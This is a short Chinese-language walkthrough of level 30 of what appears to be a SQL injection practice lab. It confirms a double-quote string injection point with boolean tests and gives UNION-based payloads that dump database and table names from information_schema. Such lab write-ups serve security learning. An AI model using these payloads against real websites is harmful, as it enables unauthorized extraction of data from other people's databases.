第30关使用GET请求传递参数,在url中构造payload即可
后端源码中并没有做什么过滤,只是在参数两边添加了双引号
输入 1" and true-- a,页面正常显示
输入 1" and false-- a,页面空显示
由此可证明存在SQL注入,注入点为双引号字符型注入
页面中有显示位,可以使用联合注入进行脱库
-1" union select 1,2,
(select group_concat(schema_name) from information_schema.schemata)
-- a
脱表
-1" union select 1,2,
(select group_concat(table_name) from information_schema.tables
where table_schema='security')
-- a